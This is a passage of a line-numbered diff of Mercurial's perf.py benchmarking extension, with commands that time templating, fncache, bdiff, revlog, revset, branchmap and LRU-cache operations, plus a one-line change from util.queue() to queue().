885 895 ctx = repo[i]
886 896 ctx.branch() # read changelog data (in addition to the index)
887 897 timer(moonwalk)
888 898 fm.end()
889 899
890 900 @command('perftemplating', formatteropts)
891 901 def perftemplating(ui, repo, rev=None, **opts):
892 902 if rev is None:
893 903 rev=[]
894 904 timer, fm = gettimer(ui, opts)
895 905 ui.pushbuffer()
896 906 timer(lambda: commands.log(ui, repo, rev=rev, date='', user='',
897 907 template='{date|shortdate} [{rev}:{node|short}]'
898 908 ' {author|person}: {desc|firstline}\n'))
899 909 ui.popbuffer()
900 910 fm.end()
901 911
902 912 @command('perfcca', formatteropts)
903 913 def perfcca(ui, repo, **opts):
904 914 timer, fm = gettimer(ui, opts)
905 915 timer(lambda: scmutil.casecollisionauditor(ui, False, repo.dirstate))
906 916 fm.end()
907 917
908 918 @command('perffncacheload', formatteropts)
909 919 def perffncacheload(ui, repo, **opts):
910 920 timer, fm = gettimer(ui, opts)
911 921 s = repo.store
912 922 def d():
913 923 s.fncache._load()
914 924 timer(d)
915 925 fm.end()
916 926
917 927 @command('perffncachewrite', formatteropts)
918 928 def perffncachewrite(ui, repo, **opts):
919 929 timer, fm = gettimer(ui, opts)
920 930 s = repo.store
921 931 s.fncache._load()
922 932 lock = repo.lock()
923 933 tr = repo.transaction('perffncachewrite')
924 934 def d():
925 935 s.fncache._dirty = True
926 936 s.fncache.write(tr)
927 937 timer(d)
928 938 tr.close()
929 939 lock.release()
930 940 fm.end()
931 941
932 942 @command('perffncacheencode', formatteropts)
933 943 def perffncacheencode(ui, repo, **opts):
934 944 timer, fm = gettimer(ui, opts)
935 945 s = repo.store
936 946 s.fncache._load()
937 947 def d():
938 948 for p in s.fncache.entries:
939 949 s.encode(p)
940 950 timer(d)
941 951 fm.end()
942 952
943 953 def _bdiffworker(q, blocks, xdiff, ready, done):
944 954 while not done.is_set():
945 955 pair = q.get()
946 956 while pair is not None:
947 957 if xdiff:
948 958 mdiff.bdiff.xdiffblocks(*pair)
949 959 elif blocks:
950 960 mdiff.bdiff.blocks(*pair)
951 961 else:
952 962 mdiff.textdiff(*pair)
953 963 q.task_done()
954 964 pair = q.get()
955 965 q.task_done() # for the None one
956 966 with ready:
957 967 ready.wait()
958 968
959 969 @command('perfbdiff', revlogopts + formatteropts + [
960 970 ('', 'count', 1, 'number of revisions to test (when using --startrev)'),
961 971 ('', 'alldata', False, 'test bdiffs for all associated revisions'),
962 972 ('', 'threads', 0, 'number of thread to use (disable with 0)'),
963 973 ('', 'blocks', False, 'test computing diffs into blocks'),
964 974 ('', 'xdiff', False, 'use xdiff algorithm'),
965 975 ],
966 976
967 977 '-c|-m|FILE REV')
968 978 def perfbdiff(ui, repo, file_, rev=None, count=None, threads=0, **opts):
969 979 """benchmark a bdiff between revisions
970 980
971 981 By default, benchmark a bdiff between its delta parent and itself.
972 982
973 983 With ``--count``, benchmark bdiffs between delta parents and self for N
974 984 revisions starting at the specified revision.
975 985
976 986 With ``--alldata``, assume the requested revision is a changeset and
977 987 measure bdiffs for all changes related to that changeset (manifest
978 988 and filelogs).
979 989 """
980 990 opts = pycompat.byteskwargs(opts)
981 991
982 992 if opts['xdiff'] and not opts['blocks']:
983 993 raise error.CommandError('perfbdiff', '--xdiff requires --blocks')
984 994
985 995 if opts['alldata']:
986 996 opts['changelog'] = True
987 997
988 998 if opts.get('changelog') or opts.get('manifest'):
989 999 file_, rev = None, file_
990 1000 elif rev is None:
991 1001 raise error.CommandError('perfbdiff', 'invalid arguments')
992 1002
993 1003 blocks = opts['blocks']
994 1004 xdiff = opts['xdiff']
995 1005 textpairs = []
996 1006
997 1007 r = cmdutil.openrevlog(repo, 'perfbdiff', file_, opts)
998 1008
999 1009 startrev = r.rev(r.lookup(rev))
1000 1010 for rev in range(startrev, min(startrev + count, len(r) - 1)):
1001 1011 if opts['alldata']:
1002 1012 # Load revisions associated with changeset.
1003 1013 ctx = repo[rev]
1004 1014 mtext = repo.manifestlog._revlog.revision(ctx.manifestnode())
1005 1015 for pctx in ctx.parents():
1006 1016 pman = repo.manifestlog._revlog.revision(pctx.manifestnode())
1007 1017 textpairs.append((pman, mtext))
1008 1018
1009 1019 # Load filelog revisions by iterating manifest delta.
1010 1020 man = ctx.manifest()
1011 1021 pman = ctx.p1().manifest()
1012 1022 for filename, change in pman.diff(man).items():
1013 1023 fctx = repo.file(filename)
1014 1024 f1 = fctx.revision(change[0][0] or -1)
1015 1025 f2 = fctx.revision(change[1][0] or -1)
1016 1026 textpairs.append((f1, f2))
1017 1027 else:
1018 1028 dp = r.deltaparent(rev)
1019 1029 textpairs.append((r.revision(dp), r.revision(rev)))
1020 1030
1021 1031 withthreads = threads > 0
1022 1032 if not withthreads:
1023 1033 def d():
1024 1034 for pair in textpairs:
1025 1035 if xdiff:
1026 1036 mdiff.bdiff.xdiffblocks(*pair)
1027 1037 elif blocks:
1028 1038 mdiff.bdiff.blocks(*pair)
1029 1039 else:
1030 1040 mdiff.textdiff(*pair)
1031 1041 else:
1032 q = util.queue()
1042 q = queue()
1033 1043 for i in xrange(threads):
1034 1044 q.put(None)
1035 1045 ready = threading.Condition()
1036 1046 done = threading.Event()
1037 1047 for i in xrange(threads):
1038 1048 threading.Thread(target=_bdiffworker,
1039 1049 args=(q, blocks, xdiff, ready, done)).start()
1040 1050 q.join()
1041 1051 def d():
1042 1052 for pair in textpairs:
1043 1053 q.put(pair)
1044 1054 for i in xrange(threads):
1045 1055 q.put(None)
1046 1056 with ready:
1047 1057 ready.notify_all()
1048 1058 q.join()
1049 1059 timer, fm = gettimer(ui, opts)
1050 1060 timer(d)
1051 1061 fm.end()
1052 1062
1053 1063 if withthreads:
1054 1064 done.set()
1055 1065 for i in xrange(threads):
1056 1066 q.put(None)
1057 1067 with ready:
1058 1068 ready.notify_all()
1059 1069
1060 1070 @command('perfunidiff', revlogopts + formatteropts + [
1061 1071 ('', 'count', 1, 'number of revisions to test (when using --startrev)'),
1062 1072 ('', 'alldata', False, 'test unidiffs for all associated revisions'),
1063 1073 ], '-c|-m|FILE REV')
1064 1074 def perfunidiff(ui, repo, file_, rev=None, count=None, **opts):
1065 1075 """benchmark a unified diff between revisions
1066 1076
1067 1077 This doesn't include any copy tracing - it's just a unified diff
1068 1078 of the texts.
1069 1079
1070 1080 By default, benchmark a diff between its delta parent and itself.
1071 1081
1072 1082 With ``--count``, benchmark diffs between delta parents and self for N
1073 1083 revisions starting at the specified revision.
1074 1084
1075 1085 With ``--alldata``, assume the requested revision is a changeset and
1076 1086 measure diffs for all changes related to that changeset (manifest
1077 1087 and filelogs).
1078 1088 """
1079 1089 if opts['alldata']:
1080 1090 opts['changelog'] = True
1081 1091
1082 1092 if opts.get('changelog') or opts.get('manifest'):
1083 1093 file_, rev = None, file_
1084 1094 elif rev is None:
1085 1095 raise error.CommandError('perfunidiff', 'invalid arguments')
1086 1096
1087 1097 textpairs = []
1088 1098
1089 1099 r = cmdutil.openrevlog(repo, 'perfunidiff', file_, opts)
1090 1100
1091 1101 startrev = r.rev(r.lookup(rev))
1092 1102 for rev in range(startrev, min(startrev + count, len(r) - 1)):
1093 1103 if opts['alldata']:
1094 1104 # Load revisions associated with changeset.
1095 1105 ctx = repo[rev]
1096 1106 mtext = repo.manifestlog._revlog.revision(ctx.manifestnode())
1097 1107 for pctx in ctx.parents():
1098 1108 pman = repo.manifestlog._revlog.revision(pctx.manifestnode())
1099 1109 textpairs.append((pman, mtext))
1100 1110
1101 1111 # Load filelog revisions by iterating manifest delta.
1102 1112 man = ctx.manifest()
1103 1113 pman = ctx.p1().manifest()
1104 1114 for filename, change in pman.diff(man).items():
1105 1115 fctx = repo.file(filename)
1106 1116 f1 = fctx.revision(change[0][0] or -1)
1107 1117 f2 = fctx.revision(change[1][0] or -1)
1108 1118 textpairs.append((f1, f2))
1109 1119 else:
1110 1120 dp = r.deltaparent(rev)
1111 1121 textpairs.append((r.revision(dp), r.revision(rev)))
1112 1122
1113 1123 def d():
1114 1124 for left, right in textpairs:
1115 1125 # The date strings don't matter, so we pass empty strings.
1116 1126 headerlines, hunks = mdiff.unidiff(
1117 1127 left, '', right, '', 'left', 'right', binary=False)
1118 1128 # consume iterators in roughly the way patch.py does
1119 1129 b'\n'.join(headerlines)
1120 1130 b''.join(sum((list(hlines) for hrange, hlines in hunks), []))
1121 1131 timer, fm = gettimer(ui, opts)
1122 1132 timer(d)
1123 1133 fm.end()
1124 1134
1125 1135 @command('perfdiffwd', formatteropts)
1126 1136 def perfdiffwd(ui, repo, **opts):
1127 1137 """Profile diff of working directory changes"""
1128 1138 timer, fm = gettimer(ui, opts)
1129 1139 options = {
1130 1140 'w': 'ignore_all_space',
1131 1141 'b': 'ignore_space_change',
1132 1142 'B': 'ignore_blank_lines',
1133 1143 }
1134 1144
1135 1145 for diffopt in ('', 'w', 'b', 'B', 'wB'):
1136 1146 opts = dict((options[c], '1') for c in diffopt)
1137 1147 def d():
1138 1148 ui.pushbuffer()
1139 1149 commands.diff(ui, repo, **opts)
1140 1150 ui.popbuffer()
1141 1151 title = 'diffopts: %s' % (diffopt and ('-' + diffopt) or 'none')
1142 1152 timer(d, title)
1143 1153 fm.end()
1144 1154
1145 1155 @command('perfrevlogindex', revlogopts + formatteropts,
1146 1156 '-c|-m|FILE')
1147 1157 def perfrevlogindex(ui, repo, file_=None, **opts):
1148 1158 """Benchmark operations against a revlog index.
1149 1159
1150 1160 This tests constructing a revlog instance, reading index data,
1151 1161 parsing index data, and performing various operations related to
1152 1162 index data.
1153 1163 """
1154 1164
1155 1165 rl = cmdutil.openrevlog(repo, 'perfrevlogindex', file_, opts)
1156 1166
1157 1167 opener = getattr(rl, 'opener') # trick linter
1158 1168 indexfile = rl.indexfile
1159 1169 data = opener.read(indexfile)
1160 1170
1161 1171 header = struct.unpack('>I', data[0:4])[0]
1162 1172 version = header & 0xFFFF
1163 1173 if version == 1:
1164 1174 revlogio = revlog.revlogio()
1165 1175 inline = header & (1 << 16)
1166 1176 else:
1167 1177 raise error.Abort(('unsupported revlog version: %d') % version)
1168 1178
1169 1179 rllen = len(rl)
1170 1180
1171 1181 node0 = rl.node(0)
1172 1182 node25 = rl.node(rllen // 4)
1173 1183 node50 = rl.node(rllen // 2)
1174 1184 node75 = rl.node(rllen // 4 * 3)
1175 1185 node100 = rl.node(rllen - 1)
1176 1186
1177 1187 allrevs = range(rllen)
1178 1188 allrevsrev = list(reversed(allrevs))
1179 1189 allnodes = [rl.node(rev) for rev in range(rllen)]
1180 1190 allnodesrev = list(reversed(allnodes))
1181 1191
1182 1192 def constructor():
1183 1193 revlog.revlog(opener, indexfile)
1184 1194
1185 1195 def read():
1186 1196 with opener(indexfile) as fh:
1187 1197 fh.read()
1188 1198
1189 1199 def parseindex():
1190 1200 revlogio.parseindex(data, inline)
1191 1201
1192 1202 def getentry(revornode):
1193 1203 index = revlogio.parseindex(data, inline)[0]
1194 1204 index[revornode]
1195 1205
1196 1206 def getentries(revs, count=1):
1197 1207 index = revlogio.parseindex(data, inline)[0]
1198 1208
1199 1209 for i in range(count):
1200 1210 for rev in revs:
1201 1211 index[rev]
1202 1212
1203 1213 def resolvenode(node):
1204 1214 nodemap = revlogio.parseindex(data, inline)[1]
1205 1215 # This only works for the C code.
1206 1216 if nodemap is None:
1207 1217 return
1208 1218
1209 1219 try:
1210 1220 nodemap[node]
1211 1221 except error.RevlogError:
1212 1222 pass
1213 1223
1214 1224 def resolvenodes(nodes, count=1):
1215 1225 nodemap = revlogio.parseindex(data, inline)[1]
1216 1226 if nodemap is None:
1217 1227 return
1218 1228
1219 1229 for i in range(count):
1220 1230 for node in nodes:
1221 1231 try:
1222 1232 nodemap[node]
1223 1233 except error.RevlogError:
1224 1234 pass
1225 1235
1226 1236 benches = [
1227 1237 (constructor, 'revlog constructor'),
1228 1238 (read, 'read'),
1229 1239 (parseindex, 'create index object'),
1230 1240 (lambda: getentry(0), 'retrieve index entry for rev 0'),
1231 1241 (lambda: resolvenode('a' * 20), 'look up missing node'),
1232 1242 (lambda: resolvenode(node0), 'look up node at rev 0'),
1233 1243 (lambda: resolvenode(node25), 'look up node at 1/4 len'),
1234 1244 (lambda: resolvenode(node50), 'look up node at 1/2 len'),
1235 1245 (lambda: resolvenode(node75), 'look up node at 3/4 len'),
1236 1246 (lambda: resolvenode(node100), 'look up node at tip'),
1237 1247 # 2x variation is to measure caching impact.
1238 1248 (lambda: resolvenodes(allnodes),
1239 1249 'look up all nodes (forward)'),
1240 1250 (lambda: resolvenodes(allnodes, 2),
1241 1251 'look up all nodes 2x (forward)'),
1242 1252 (lambda: resolvenodes(allnodesrev),
1243 1253 'look up all nodes (reverse)'),
1244 1254 (lambda: resolvenodes(allnodesrev, 2),
1245 1255 'look up all nodes 2x (reverse)'),
1246 1256 (lambda: getentries(allrevs),
1247 1257 'retrieve all index entries (forward)'),
1248 1258 (lambda: getentries(allrevs, 2),
1249 1259 'retrieve all index entries 2x (forward)'),
1250 1260 (lambda: getentries(allrevsrev),
1251 1261 'retrieve all index entries (reverse)'),
1252 1262 (lambda: getentries(allrevsrev, 2),
1253 1263 'retrieve all index entries 2x (reverse)'),
1254 1264 ]
1255 1265
1256 1266 for fn, title in benches:
1257 1267 timer, fm = gettimer(ui, opts)
1258 1268 timer(fn, title=title)
1259 1269 fm.end()
1260 1270
1261 1271 @command('perfrevlogrevisions', revlogopts + formatteropts +
1262 1272 [('d', 'dist', 100, 'distance between the revisions'),
1263 1273 ('s', 'startrev', 0, 'revision to start reading at'),
1264 1274 ('', 'reverse', False, 'read in reverse')],
1265 1275 '-c|-m|FILE')
1266 1276 def perfrevlogrevisions(ui, repo, file_=None, startrev=0, reverse=False,
1267 1277 **opts):
1268 1278 """Benchmark reading a series of revisions from a revlog.
1269 1279
1270 1280 By default, we read every ``-d/--dist`` revision from 0 to tip of
1271 1281 the specified revlog.
1272 1282
1273 1283 The start revision can be defined via ``-s/--startrev``.
1274 1284 """
1275 1285 rl = cmdutil.openrevlog(repo, 'perfrevlogrevisions', file_, opts)
1276 1286 rllen = getlen(ui)(rl)
1277 1287
1278 1288 def d():
1279 1289 rl.clearcaches()
1280 1290
1281 1291 beginrev = startrev
1282 1292 endrev = rllen
1283 1293 dist = opts['dist']
1284 1294
1285 1295 if reverse:
1286 1296 beginrev, endrev = endrev, beginrev
1287 1297 dist = -1 * dist
1288 1298
1289 1299 for x in xrange(beginrev, endrev, dist):
1290 1300 # Old revisions don't support passing int.
1291 1301 n = rl.node(x)
1292 1302 rl.revision(n)
1293 1303
1294 1304 timer, fm = gettimer(ui, opts)
1295 1305 timer(d)
1296 1306 fm.end()
1297 1307
1298 1308 @command('perfrevlogchunks', revlogopts + formatteropts +
1299 1309 [('e', 'engines', '', 'compression engines to use'),
1300 1310 ('s', 'startrev', 0, 'revision to start at')],
1301 1311 '-c|-m|FILE')
1302 1312 def perfrevlogchunks(ui, repo, file_=None, engines=None, startrev=0, **opts):
1303 1313 """Benchmark operations on revlog chunks.
1304 1314
1305 1315 Logically, each revlog is a collection of fulltext revisions. However,
1306 1316 stored within each revlog are "chunks" of possibly compressed data. This
1307 1317 data needs to be read and decompressed or compressed and written.
1308 1318
1309 1319 This command measures the time it takes to read+decompress and recompress
1310 1320 chunks in a revlog. It effectively isolates I/O and compression performance.
1311 1321 For measurements of higher-level operations like resolving revisions,
1312 1322 see ``perfrevlogrevisions`` and ``perfrevlogrevision``.
1313 1323 """
1314 1324 rl = cmdutil.openrevlog(repo, 'perfrevlogchunks', file_, opts)
1315 1325
1316 1326 # _chunkraw was renamed to _getsegmentforrevs.
1317 1327 try:
1318 1328 segmentforrevs = rl._getsegmentforrevs
1319 1329 except AttributeError:
1320 1330 segmentforrevs = rl._chunkraw
1321 1331
1322 1332 # Verify engines argument.
1323 1333 if engines:
1324 1334 engines = set(e.strip() for e in engines.split(','))
1325 1335 for engine in engines:
1326 1336 try:
1327 1337 util.compressionengines[engine]
1328 1338 except KeyError:
1329 1339 raise error.Abort('unknown compression engine: %s' % engine)
1330 1340 else:
1331 1341 engines = []
1332 1342 for e in util.compengines:
1333 1343 engine = util.compengines[e]
1334 1344 try:
1335 1345 if engine.available():
1336 1346 engine.revlogcompressor().compress('dummy')
1337 1347 engines.append(e)
1338 1348 except NotImplementedError:
1339 1349 pass
1340 1350
1341 1351 revs = list(rl.revs(startrev, len(rl) - 1))
1342 1352
1343 1353 def rlfh(rl):
1344 1354 if rl._inline:
1345 1355 return getsvfs(repo)(rl.indexfile)
1346 1356 else:
1347 1357 return getsvfs(repo)(rl.datafile)
1348 1358
1349 1359 def doread():
1350 1360 rl.clearcaches()
1351 1361 for rev in revs:
1352 1362 segmentforrevs(rev, rev)
1353 1363
1354 1364 def doreadcachedfh():
1355 1365 rl.clearcaches()
1356 1366 fh = rlfh(rl)
1357 1367 for rev in revs:
1358 1368 segmentforrevs(rev, rev, df=fh)
1359 1369
1360 1370 def doreadbatch():
1361 1371 rl.clearcaches()
1362 1372 segmentforrevs(revs[0], revs[-1])
1363 1373
1364 1374 def doreadbatchcachedfh():
1365 1375 rl.clearcaches()
1366 1376 fh = rlfh(rl)
1367 1377 segmentforrevs(revs[0], revs[-1], df=fh)
1368 1378
1369 1379 def dochunk():
1370 1380 rl.clearcaches()
1371 1381 fh = rlfh(rl)
1372 1382 for rev in revs:
1373 1383 rl._chunk(rev, df=fh)
1374 1384
1375 1385 chunks = [None]
1376 1386
1377 1387 def dochunkbatch():
1378 1388 rl.clearcaches()
1379 1389 fh = rlfh(rl)
1380 1390 # Save chunks as a side-effect.
1381 1391 chunks[0] = rl._chunks(revs, df=fh)
1382 1392
1383 1393 def docompress(compressor):
1384 1394 rl.clearcaches()
1385 1395
1386 1396 try:
1387 1397 # Swap in the requested compression engine.
1388 1398 oldcompressor = rl._compressor
1389 1399 rl._compressor = compressor
1390 1400 for chunk in chunks[0]:
1391 1401 rl.compress(chunk)
1392 1402 finally:
1393 1403 rl._compressor = oldcompressor
1394 1404
1395 1405 benches = [
1396 1406 (lambda: doread(), 'read'),
1397 1407 (lambda: doreadcachedfh(), 'read w/ reused fd'),
1398 1408 (lambda: doreadbatch(), 'read batch'),
1399 1409 (lambda: doreadbatchcachedfh(), 'read batch w/ reused fd'),
1400 1410 (lambda: dochunk(), 'chunk'),
1401 1411 (lambda: dochunkbatch(), 'chunk batch'),
1402 1412 ]
1403 1413
1404 1414 for engine in sorted(engines):
1405 1415 compressor = util.compengines[engine].revlogcompressor()
1406 1416 benches.append((functools.partial(docompress, compressor),
1407 1417 'compress w/ %s' % engine))
1408 1418
1409 1419 for fn, title in benches:
1410 1420 timer, fm = gettimer(ui, opts)
1411 1421 timer(fn, title=title)
1412 1422 fm.end()
1413 1423
1414 1424 @command('perfrevlogrevision', revlogopts + formatteropts +
1415 1425 [('', 'cache', False, 'use caches instead of clearing')],
1416 1426 '-c|-m|FILE REV')
1417 1427 def perfrevlogrevision(ui, repo, file_, rev=None, cache=None, **opts):
1418 1428 """Benchmark obtaining a revlog revision.
1419 1429
1420 1430 Obtaining a revlog revision consists of roughly the following steps:
1421 1431
1422 1432 1. Compute the delta chain
1423 1433 2. Obtain the raw chunks for that delta chain
1424 1434 3. Decompress each raw chunk
1425 1435 4. Apply binary patches to obtain fulltext
1426 1436 5. Verify hash of fulltext
1427 1437
1428 1438 This command measures the time spent in each of these phases.
1429 1439 """
1430 1440 if opts.get('changelog') or opts.get('manifest'):
1431 1441 file_, rev = None, file_
1432 1442 elif rev is None:
1433 1443 raise error.CommandError('perfrevlogrevision', 'invalid arguments')
1434 1444
1435 1445 r = cmdutil.openrevlog(repo, 'perfrevlogrevision', file_, opts)
1436 1446
1437 1447 # _chunkraw was renamed to _getsegmentforrevs.
1438 1448 try:
1439 1449 segmentforrevs = r._getsegmentforrevs
1440 1450 except AttributeError:
1441 1451 segmentforrevs = r._chunkraw
1442 1452
1443 1453 node = r.lookup(rev)
1444 1454 rev = r.rev(node)
1445 1455
1446 1456 def getrawchunks(data, chain):
1447 1457 start = r.start
1448 1458 length = r.length
1449 1459 inline = r._inline
1450 1460 iosize = r._io.size
1451 1461 buffer = util.buffer
1452 1462 offset = start(chain[0])
1453 1463
1454 1464 chunks = []
1455 1465 ladd = chunks.append
1456 1466
1457 1467 for rev in chain:
1458 1468 chunkstart = start(rev)
1459 1469 if inline:
1460 1470 chunkstart += (rev + 1) * iosize
1461 1471 chunklength = length(rev)
1462 1472 ladd(buffer(data, chunkstart - offset, chunklength))
1463 1473
1464 1474 return chunks
1465 1475
1466 1476 def dodeltachain(rev):
1467 1477 if not cache:
1468 1478 r.clearcaches()
1469 1479 r._deltachain(rev)
1470 1480
1471 1481 def doread(chain):
1472 1482 if not cache:
1473 1483 r.clearcaches()
1474 1484 segmentforrevs(chain[0], chain[-1])
1475 1485
1476 1486 def dorawchunks(data, chain):
1477 1487 if not cache:
1478 1488 r.clearcaches()
1479 1489 getrawchunks(data, chain)
1480 1490
1481 1491 def dodecompress(chunks):
1482 1492 decomp = r.decompress
1483 1493 for chunk in chunks:
1484 1494 decomp(chunk)
1485 1495
1486 1496 def dopatch(text, bins):
1487 1497 if not cache:
1488 1498 r.clearcaches()
1489 1499 mdiff.patches(text, bins)
1490 1500
1491 1501 def dohash(text):
1492 1502 if not cache:
1493 1503 r.clearcaches()
1494 1504 r.checkhash(text, node, rev=rev)
1495 1505
1496 1506 def dorevision():
1497 1507 if not cache:
1498 1508 r.clearcaches()
1499 1509 r.revision(node)
1500 1510
1501 1511 chain = r._deltachain(rev)[0]
1502 1512 data = segmentforrevs(chain[0], chain[-1])[1]
1503 1513 rawchunks = getrawchunks(data, chain)
1504 1514 bins = r._chunks(chain)
1505 1515 text = str(bins[0])
1506 1516 bins = bins[1:]
1507 1517 text = mdiff.patches(text, bins)
1508 1518
1509 1519 benches = [
1510 1520 (lambda: dorevision(), 'full'),
1511 1521 (lambda: dodeltachain(rev), 'deltachain'),
1512 1522 (lambda: doread(chain), 'read'),
1513 1523 (lambda: dorawchunks(data, chain), 'rawchunks'),
1514 1524 (lambda: dodecompress(rawchunks), 'decompress'),
1515 1525 (lambda: dopatch(text, bins), 'patch'),
1516 1526 (lambda: dohash(text), 'hash'),
1517 1527 ]
1518 1528
1519 1529 for fn, title in benches:
1520 1530 timer, fm = gettimer(ui, opts)
1521 1531 timer(fn, title=title)
1522 1532 fm.end()
1523 1533
1524 1534 @command('perfrevset',
1525 1535 [('C', 'clear', False, 'clear volatile cache between each call.'),
1526 1536 ('', 'contexts', False, 'obtain changectx for each revision')]
1527 1537 + formatteropts, "REVSET")
1528 1538 def perfrevset(ui, repo, expr, clear=False, contexts=False, **opts):
1529 1539 """benchmark the execution time of a revset
1530 1540
1531 1541 Use the --clean option if need to evaluate the impact of build volatile
1532 1542 revisions set cache on the revset execution. Volatile cache hold filtered
1533 1543 and obsolete related cache."""
1534 1544 timer, fm = gettimer(ui, opts)
1535 1545 def d():
1536 1546 if clear:
1537 1547 repo.invalidatevolatilesets()
1538 1548 if contexts:
1539 1549 for ctx in repo.set(expr): pass
1540 1550 else:
1541 1551 for r in repo.revs(expr): pass
1542 1552 timer(d)
1543 1553 fm.end()
1544 1554
1545 1555 @command('perfvolatilesets',
1546 1556 [('', 'clear-obsstore', False, 'drop obsstore between each call.'),
1547 1557 ] + formatteropts)
1548 1558 def perfvolatilesets(ui, repo, *names, **opts):
1549 1559 """benchmark the computation of various volatile set
1550 1560
1551 1561 Volatile set computes element related to filtering and obsolescence."""
1552 1562 timer, fm = gettimer(ui, opts)
1553 1563 repo = repo.unfiltered()
1554 1564
1555 1565 def getobs(name):
1556 1566 def d():
1557 1567 repo.invalidatevolatilesets()
1558 1568 if opts['clear_obsstore']:
1559 1569 clearfilecache(repo, 'obsstore')
1560 1570 obsolete.getrevs(repo, name)
1561 1571 return d
1562 1572
1563 1573 allobs = sorted(obsolete.cachefuncs)
1564 1574 if names:
1565 1575 allobs = [n for n in allobs if n in names]
1566 1576
1567 1577 for name in allobs:
1568 1578 timer(getobs(name), title=name)
1569 1579
1570 1580 def getfiltered(name):
1571 1581 def d():
1572 1582 repo.invalidatevolatilesets()
1573 1583 if opts['clear_obsstore']:
1574 1584 clearfilecache(repo, 'obsstore')
1575 1585 repoview.filterrevs(repo, name)
1576 1586 return d
1577 1587
1578 1588 allfilter = sorted(repoview.filtertable)
1579 1589 if names:
1580 1590 allfilter = [n for n in allfilter if n in names]
1581 1591
1582 1592 for name in allfilter:
1583 1593 timer(getfiltered(name), title=name)
1584 1594 fm.end()
1585 1595
1586 1596 @command('perfbranchmap',
1587 1597 [('f', 'full', False,
1588 1598 'Includes build time of subset'),
1589 1599 ('', 'clear-revbranch', False,
1590 1600 'purge the revbranch cache between computation'),
1591 1601 ] + formatteropts)
1592 1602 def perfbranchmap(ui, repo, *filternames, **opts):
1593 1603 """benchmark the update of a branchmap
1594 1604
1595 1605 This benchmarks the full repo.branchmap() call with read and write disabled
1596 1606 """
1597 1607 full = opts.get("full", False)
1598 1608 clear_revbranch = opts.get("clear_revbranch", False)
1599 1609 timer, fm = gettimer(ui, opts)
1600 1610 def getbranchmap(filtername):
1601 1611 """generate a benchmark function for the filtername"""
1602 1612 if filtername is None:
1603 1613 view = repo
1604 1614 else:
1605 1615 view = repo.filtered(filtername)
1606 1616 def d():
1607 1617 if clear_revbranch:
1608 1618 repo.revbranchcache()._clear()
1609 1619 if full:
1610 1620 view._branchcaches.clear()
1611 1621 else:
1612 1622 view._branchcaches.pop(filtername, None)
1613 1623 view.branchmap()
1614 1624 return d
1615 1625 # add filter in smaller subset to bigger subset
1616 1626 possiblefilters = set(repoview.filtertable)
1617 1627 if filternames:
1618 1628 possiblefilters &= set(filternames)
1619 1629 subsettable = getbranchmapsubsettable()
1620 1630 allfilters = []
1621 1631 while possiblefilters:
1622 1632 for name in possiblefilters:
1623 1633 subset = subsettable.get(name)
1624 1634 if subset not in possiblefilters:
1625 1635 break
1626 1636 else:
1627 1637 assert False, 'subset cycle %s!' % possiblefilters
1628 1638 allfilters.append(name)
1629 1639 possiblefilters.remove(name)
1630 1640
1631 1641 # warm the cache
1632 1642 if not full:
1633 1643 for name in allfilters:
1634 1644 repo.filtered(name).branchmap()
1635 1645 if not filternames or 'unfiltered' in filternames:
1636 1646 # add unfiltered
1637 1647 allfilters.append(None)
1638 1648
1639 1649 branchcacheread = safeattrsetter(branchmap, 'read')
1640 1650 branchcachewrite = safeattrsetter(branchmap.branchcache, 'write')
1641 1651 branchcacheread.set(lambda repo: None)
1642 1652 branchcachewrite.set(lambda bc, repo: None)
1643 1653 try:
1644 1654 for name in allfilters:
1645 1655 printname = name
1646 1656 if name is None:
1647 1657 printname = 'unfiltered'
1648 1658 timer(getbranchmap(name), title=str(printname))
1649 1659 finally:
1650 1660 branchcacheread.restore()
1651 1661 branchcachewrite.restore()
1652 1662 fm.end()
1653 1663
1654 1664 @command('perfloadmarkers')
1655 1665 def perfloadmarkers(ui, repo):
1656 1666 """benchmark the time to parse the on-disk markers for a repo
1657 1667
1658 1668 Result is the number of markers in the repo."""
1659 1669 timer, fm = gettimer(ui)
1660 1670 svfs = getsvfs(repo)
1661 1671 timer(lambda: len(obsolete.obsstore(svfs)))
1662 1672 fm.end()
1663 1673
1664 1674 @command('perflrucachedict', formatteropts +
1665 1675 [('', 'size', 4, 'size of cache'),
1666 1676 ('', 'gets', 10000, 'number of key lookups'),
1667 1677 ('', 'sets', 10000, 'number of key sets'),
1668 1678 ('', 'mixed', 10000, 'number of mixed mode operations'),
1669 1679 ('', 'mixedgetfreq', 50, 'frequency of get vs set ops in mixed mode')],
1670 1680 norepo=True)
1671 1681 def perflrucache(ui, size=4, gets=10000, sets=10000, mixed=10000,
1672 1682 mixedgetfreq=50, **opts):
1673 1683 def doinit():
1674 1684 for i in xrange(10000):
1675 1685 util.lrucachedict(size)
1676 1686
1677 1687 values = []
1678 1688 for i in xrange(size):
1679 1689 values.append(random.randint(0, sys.maxint))
1680 1690
1681 1691 # Get mode fills the cache and tests raw lookup performance with no
1682 1692 # eviction.
1683 1693 getseq = []
1684 1694 for i in xrange(gets):
1685 1695 getseq.append(random.choice(values))
1686 1696
1687 1697 def dogets():
1688 1698 d = util.lrucachedict(size)
1689 1699 for v in values:
1690 1700 d[v] = v
1691 1701 for key in getseq:
1692 1702 value = d[key]
1693 1703 value # silence pyflakes warning
1694 1704
1695 1705 # Set mode tests insertion speed with cache eviction.
1696 1706 setseq = []
1697 1707 for i in xrange(sets):
1698 1708 setseq.append(random.randint(0, sys.maxint))
1699 1709
1700 1710 def dosets():
1701 1711 d = util.lrucachedict(size)
1702 1712 for v in setseq:
1703 1713 d[v] = v
1704 1714
1705 1715 # Mixed mode randomly performs gets and sets with eviction.
1706 1716 mixedops = []
1707 1717 for i in xrange(mixed):
1708 1718 r = random.randint(0, 100)
1709 1719 if r < mixedgetfreq:
1710 1720 op = 0
1711 1721 else:
1712 1722 op = 1
1713 1723
1714 1724 mixedops.append((op, random.randint(0, size * 2)))
1715 1725
1716 1726 def domixed():
1717 1727 d = util.lrucachedict(size)
1718 1728
1719 1729 for op, v in mixedops:
1720 1730 if op == 0:
1721 1731 try:
1722 1732 d[v]
1723 1733 except KeyError:
1724 1734 pass
1725 1735 else:
1726 1736 d[v] = v
1727 1737
1728 1738 benches = [
1729 1739 (doinit, 'init'),
1730 1740 (dogets, 'gets'),
1731 1741 (dosets, 'sets'),
1732 1742 (domixed, 'mixed')
1733 1743 ]
1734 1744
1735 1745 for fn, title in benches:
1736 1746 timer, fm = gettimer(ui, opts)
1737 1747 timer(fn, title=title)
1738 1748 fm.end()
1739 1749
1740 1750 @command('perfwrite', formatteropts)
1741 1751 def perfwrite(ui, repo, **opts):
